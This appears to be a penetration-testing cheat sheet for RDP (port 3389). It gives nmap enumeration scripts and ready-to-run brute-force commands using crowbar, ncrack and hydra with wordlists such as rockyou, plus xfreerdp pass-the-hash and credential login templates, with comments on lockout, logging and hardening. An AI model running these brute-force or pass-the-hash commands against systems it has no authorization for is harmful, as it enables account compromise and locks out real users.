3389 - Pentesting RDP
nmap
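# Service fingerprinting on TCP/3389. -Pn skips host discovery and -T4 selects
# nmap's "aggressive" timing template. NSE scripts selected:
#   rdp-enum-encryption - lists the security layers / encryption levels offered
#   rdp-vuln-ms12-020   - checks for the MS12-020 RDP vulnerability
#   rdp-ntlm-info       - reads host, domain and OS build data from the NTLM
#                         challenge exposed when CredSSP (NLA) is enabled
# Hardening findings to record from the output: NLA not enforced, the legacy
# "RDP Security" layer still offered, MS12-020 unpatched, and 3389 reachable
# from networks that should go through a VPN or RD Gateway.
# "$IP" is quoted so the value is always passed as exactly one argument.
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 -Pn "$IP"
# impacket's rdp_check.py reaches CredSSP authentication to test whether an
# account is valid on the host.
# NOTE(review): upstream usage takes [[domain/]username[:password]@]<target>;
# a bare address as written here may prompt or fail - confirm against the
# installed impacket version.
/opt/tools/impacket/examples/rdp_check.py "$IP"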
bruteforce - crowbar
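# Online password guessing against RDP with crowbar (-b rdp, -vv verbose).
# First line: one account (-u) against a password list (-C).
# Second line: a username list (-U) against the same password list.
# Effect on the target: each failed guess is a failed logon (Windows Security
# Event ID 4625) and counts toward the account lockout threshold, so real
# users can be locked out. Controls this exercises: lockout policy, NLA,
# MFA / RD Gateway in front of 3389, and alerting on bursts of 4625 from a
# single source address.
# NOTE(review): crowbar documents --server in CIDR form (e.g. <IP>/32) -
# confirm that $IP carries the mask.
# "$IP" is quoted so the value is always passed as exactly one argument.
crowbar --server "$IP" -b rdp -u pedro -C /usr/share/nmap/nselib/data/passwords.lst -vv
crowbar --server "$IP" -b rdp -U /usr/share/nmap/nselib/data/usernames.lst -C /usr/share/nmap/nselib/data/passwords.lst -vv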
bruteforce - ncrack
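# Online password guessing against RDP with ncrack (-vv verbose).
# First line: a named account (--user) against the password file (-P).
# Second line: usernames read from user.txt (-U), resolved relative to the
# current directory.
# rockyou.txt is a very large list, so a full run is long and produces a
# sustained stream of failed logons (Windows Security Event ID 4625); with a
# lockout policy in place the tested accounts will lock. Detection should
# key on failed-logon volume per source and per account.
# The URL is quoted so "$IP" is always passed as part of one argument.
ncrack -vv --user chris -P /usr/share/wordlists/rockyou.txt "rdp://$IP"
ncrack -vv -U user.txt -P /usr/share/wordlists/rockyou.txt "rdp://$IP"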
bruteforce - hydra
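# Online password guessing against RDP with hydra.
#   -V  print every login/password pair tried
#   -f  stop after the first valid pair is found
#   -l / -L  single login / file of logins
#   -P  file of candidate passwords
# As with any online guessing, failures are logged on the target as Windows
# Security Event ID 4625 and count toward account lockout. Enforcing NLA, a
# lockout threshold and MFA, and keeping 3389 off untrusted networks, are the
# mitigations this test measures.
# The URL is quoted so "$IP" is always passed as part of one argument.
hydra -V -f -l pedro -P /usr/share/nmap/nselib/data/passwords.lst "rdp://$IP"
hydra -V -f -L /usr/share/nmap/nselib/data/usernames.lst -P /usr/share/nmap/nselib/data/passwords.lst "rdp://$IP"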
Connect with known credentials/hash
# Command templates: <...> marks a value to substitute and [...] an optional
# argument; the lines are not literal shell and must be edited before use.
# rdesktop with only a username; no password is given on the command line.
rdesktop $IP -u <username>
# A password passed via -p (or /p: below) is visible in the process list and
# is saved in shell history. rdesktop accepts "-p -" to read it from stdin,
# and xfreerdp prompts when /p: is omitted.
rdesktop -d <domain> -u <username> -p <password> <IP>
xfreerdp [/d:domain] /u:<username> /p:<password> /v:<IP>
# /pth: authenticates with a password hash instead of the password. FreeRDP
# documents this as Restricted Admin mode, so it is only accepted by hosts
# where that mode is enabled; whether it is enabled is a hardening finding
# to report.
xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:<IP>
# Worked example with hard-coded sample values (admin / 123456 / 10.11.1.7).
# /cert:ignore turns off server certificate validation, so the session can be
# intercepted by a machine-in-the-middle; /w and /h set the window size.
xfreerdp /u:admin /p:123456 /cert:ignore /v:10.11.1.7 /w:2000 /h:900